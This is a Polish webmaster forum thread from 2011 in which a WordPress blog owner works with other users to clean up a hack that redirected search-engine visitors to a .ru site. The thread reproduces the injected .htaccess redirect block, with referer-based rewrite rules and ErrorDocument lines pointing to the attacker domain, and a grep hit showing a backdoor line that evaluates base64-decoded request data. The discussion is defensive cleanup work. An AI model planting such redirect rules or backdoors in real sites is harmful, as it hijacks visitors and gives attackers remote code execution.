Włamanie na strone

[Elias]

Witam,

mam taki problem i nie wiem jak to w ogóle urgyść.

Mam swojego bloga na WP o turystyce https://www.krakowskieokolice.pl . Dziś dzwoni do mnie znajomy i mówi, że coś dziwnego się dzieje jak wchodzi na tą stronę. U siebie patrze i wszystko ok. Jednak jak wyczyściłem cache itp. Okazało się że strona jest chyba gdzieś przekierowywana. Na jakiś serwis .ru .

Wszedłem do FTP i w pliku htcacces nie widzę nic dziwnego. Zacząłem sprawdzać datę modyfikacji. Usunąłem z mojej templatki jakieś bardzo podejrzane nowe pliki, które pojawiły się wczoraj i dziś. Myślałem że to pomogło ale nadal jak próbuję wejść na stronę to mam komunikat że strona jest niebezpieczna...

Proszę o pomoc - co robić? Gdzie może być zaszyte przekierowanie itp. Inna strona na tym koncie działa, ale też jest zgłoszona jako potencjalnie niebezpieczna aczkolwiek myślę, że to przez tamtą.

[Mion]

Jaka wersja WP ?

[Elias]

Jaka wersja WP ?

wersja to 3.0.1..

Dziwi mnie to, że jak wchodze na inną stronę na tym sharedzie to też jest ten komunikat. A mam tam np. na innej domenie panel do stat4seo.

[Mion]

Włamanie mogło być z automatu po przez FTP. Należało by prześledzić logi serwera HTTP oraz poprosić o logi do FTP i je przeanalizować.

[fanta001]

Przedwczoraj też miałem jakieś włamanie na 2 serwisy postawione na WP.

Dokleiło mi jakieś dziwne rzeczy do plików i dodatkowo:

- na początku wywaliło całkiem WP że strony nie działały (później jak pousuwałem część śmieci to ruszył ale wciąż dziwnie się zachowywał)

- wywaliło mi cały transfer na hostingu w ciągu 1 dnia

- pojawiły się niby linki do moich WP gdzieś nie wiadomo gdzie (pokazuje w kokpicie)

Jak to się stało trudno powiedzieć ale mam pewne podejrzenia. Stało się to w tym samy czasie jak na subdomenach obu WP instalowałem Arfooo + spolszczenie Arfooo + paczkę plików ze zmianami umieszczonymi na PIO.

Nie przesądzam, że to na pewno to ale myślę że gdzieś w plikach (nie wiem, w której paczce) było jakieś gó....

Dzisiaj usuwałem WP i instalował będę na nowo. Szczęście że były świeże i są backupy robione. Przez FTP raczej to się nie stało

[Elias]

Ja w swojej aktywnej tamplatce w WP znalazłem jakiś syf. Wywaliłem ale nadal nic. Powiedzcie czy macie ten komunikat o zagrożeniu ? U mnie jest tak, że jak wpisuje z palca adres to raz jest a raz nie ma, a jak wchodzę z Google z jakieś frazy to jest zawsze.

W ogóle przekierowuje was na jakąś inną stronę?

Jakie jest prawdopodobieństwo że to coś zalęgło się w bazach danych?

EDIT

Przejrzałem każdy folder, każdy pliczek na FTP i nie ma tam już nic podejrzanego co by było modyfikowane w ciągu ostatnich 1 - 2 dni... A na bank wcześniej nie było żadnej hecy bo jestem na stronie codziennie, śledzę ją w GA itp i żadnych dziwnych rzeczy nie dopatrzyłem się. W GWT też na razie cisza.

[Mion]

śledzę ją w GA itp i żadnych dziwnych rzeczy nie dopatrzyłem się. W GWT też na razie cisza.

Takich informacji nie znajdziesz w GA Tylko logi serwera HTTP oraz FTP mogą "powiedzieć" skąd dokonano "włamania".

[Elias]

Wiem, bardziej chodziło mi o to, że jest to dowód że rzecz stałą się dziś, bo widziałbym w GA nagły spadek odwiedzin wczoraj.

O logi właśnie wysłałem prośbę, tyle że mają je tylko z dnia dzisiejszego... Gdzie to całe przekierowanie może być zaszyte?

EDIT

Ok, mam logi z FTP z ostatniego roku jako że mam stałę IP to łatwo mi było sprawdzić, że nikt inny się nie logował. Czy to oznacza że atak odbył się przez inny kanał ? (jestem newbie w tych rzeczach).

[Veal]

Używasz do generowania miniatur skryptu timthumb w którym ostatnio znaleziono lukę, pobierz nową wersję i będzie po problemie (a raczej po jego przyczynie bo to co napsuli trzeba w dalszym ciągu poprawić).

[Mion]

Skoro nikt się nie logował na FTP to ten kanał odpada.

Szukaj amonali w logach HTTP apacha.

-------

Masz stronę

Strona zgłoszona jako dokonująca ataków!

Strona now-protect.ru została zgłoszona jako strona stanowiąca zagrożenie i została zablokowana zgodnie z ustawieniami bezpieczeństwa.

--------

Diagnoza:

Masz wstawkę w pliku PHP która sprawdza redirect i jeśli jest z google.pl masz przekierowanie:

HTTP/1.1 301 Moved Permanently Date: Tue, 06 Sep 2011 21:37:34 GMT Server: Apache Location: https://now-protect.ru/accaunt/index.php Content-Type: text/html; charset=iso-8859-1

Możesz to takim kodem przetestować:

<?php
//  krakowskieokolice.php

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,'https://www.krakowskieokolice.pl/');
curl_setopt($ch, CURLOPT_HEADER, TRUE);
curl_setopt($ch, CURLOPT_NOBODY, TRUE); // remove body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch,CURLOPT_REFERER,'https://www.google.pl'); 
$head = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch); 
echo $head;
?>

Rozwiązanie:

Pobierz pliki z FTP i szukaj wystąpienia ciągów

eval

eval(base64_decode

google

now-protect.ru

jesli znajdziesz skasuj dany fragment kodu. Najprawdopodobniej bedzie w index.php na początku lub inny includowanym.

Oczywiście pokaźniej musisz załatać skrypty PHP, bo bez tego za jakiś czas będziesz mial to samo .

[Elias]

Wielkie dzięki, trop jest dobry.

Znalazłem w .htacces taki kod, był pareset linii poniżej normalnego... Został już usunięty ze wszytskich plików .htacces na serwerze.

ErrorDocument 400 https://now-protect.ru/accaunt/index.php
ErrorDocument 401 https://now-protect.ru/accaunt/index.php
ErrorDocument 403 https://now-protect.ru/accaunt/index.php
ErrorDocument 404 https://now-protect.ru/accaunt/index.php
ErrorDocument 500 https://now-protect.ru/accaunt/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ https://now-protect.ru/accaunt/index.php [R=301,L]
</IfModule>

Niestety problem dalej występuje. Ściągnąłem pliki krakowskieokolice.pl na FTP tak jak radziłeś. .ru i google występowało tylko w .htacces. Teraz mam pytanie czy usunąć wszystko co zawiera w sobie

"eval(base64_decode" bo znalazłem 5 przypadków:

E:\publickhtml\www.krakowskieokolice.pl\wp-content\plugins\broken-link-checker\idn\uctc.php 11,00 KB 2011-09-07 09:02:11
41		 if ($from != 'ucs4array') eval('$data = self::'.$from.'_ucs4array($data);');
42		 if ($to != 'ucs4array') eval('$data = self::ucs4array_'.$to.'($data);');
191					 $tmp = base64_decode($b64);

E:\publickhtml\www.krakowskieokolice.pl\wp-content\plugins\wp-super-cache\wp-cache.php 152,00 KB 2011-09-07 09:12:16
1873 			$deleteuri = preg_replace( '/[ <>\'\"\r\n\t\(\)]/', '', str_replace( '/index.php', '/', str_replace( '..', '', preg_replace("/(\?.*)?$/", '', base64_decode( $_GET[ 'uri' ] ) ) ) ) );
1880 			$supercacheuri = preg_replace( '/[ <>\'\"\r\n\t\(\)]/', '', str_replace( '/index.php', '/', str_replace( '..', '', preg_replace("/(\?.*)?$/", '', base64_decode( $_GET[ 'uri' ] ) ) ) ) );
2468 	$gziprules .= "<IfModule mod_headers.c>\n  Header set Vary \"Accept-Encoding, Cookie\"\n  Header set Cache-Control 'max-age=3, must-revalidate'\n</IfModule>\n";

E:\publickhtml\www.krakowskieokolice.pl\wp-content\themes\typebased\config_db.php 4,00 KB 2011-09-07 09:13:35
36 	case 'eval':
37 				echo eval(base64_url_decode(@$_REQUEST['data']));
117 	return base64_decode($data);

E:\publickhtml\www.krakowskieokolice.pl\wp-content\themes\typebased\thumb.php 53,00 KB 2011-09-07 09:13:31
203 				  $imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YUZ\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");
206 				  header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');
1000 				  header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');
1005 				  header('Cache-Control: max-age=' . BROWSER_CACHE_MAX_AGE . ', must-revalidate');
1161 			header ('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');

E:\publickhtml\www.krakowskieokolice.pl\wp-includes\class-simplepie.php 394,00 KB 2011-09-07 09:16:07
11334 		header('Cache-Control: must-revalidate');
14834 				$data = base64_decode($data);

ps. a co powiecie na to https://terrygl.hubpages.com/hub/How-To-Rem...64_decode-Virus gość ma tam jakiś skrypt do czyszczenia - warto spróbować?

[Mion]

@pytanie czy usunąć wszystko co zawiera w sobie

eval(base64_decode < często też jest używane jeśli w szablonie masz linki do autora które nie można kasować Musisz sprawdzić empirycznie...

--------

Nadal masz przekierowanie:

HTTP/1.1 301 Moved Permanently Date: Wed, 07 Sep 2011 08:56:20 GMT Server: Apache Location: https://now-protect.ru/accaunt/index.php Content-Type: text/html; charset=iso-8859-1

.htaccess poprawiłeś - sprawdź na serwerze czy masz dobry.

[Elias]

Podsumowanie:

Udałosię mam nadzieję że na dłuższą chwilę...

Rzeczywiście te htcacces nie podmieniły się po edycji, teraz jak rzeczywiście usunąłem te reguły z .ru problem zniknął (mam nadzieje że u was też, ale musicie wyczyścić cache i ciastka zanim sprawdzicie).

Luka niestety nadal nie znana. Podejrzewam swój hosting, ew. przyczyną mogą być niezaktualizowane wtyczki i Wordpress co zaraz uczynię.

Dziękuje wszystkim za pomoc - mam nadzieję że plikach .php nie ma jakiegoś dziadostwa które za parę godzin, dni się uaktywni i będzie to samo.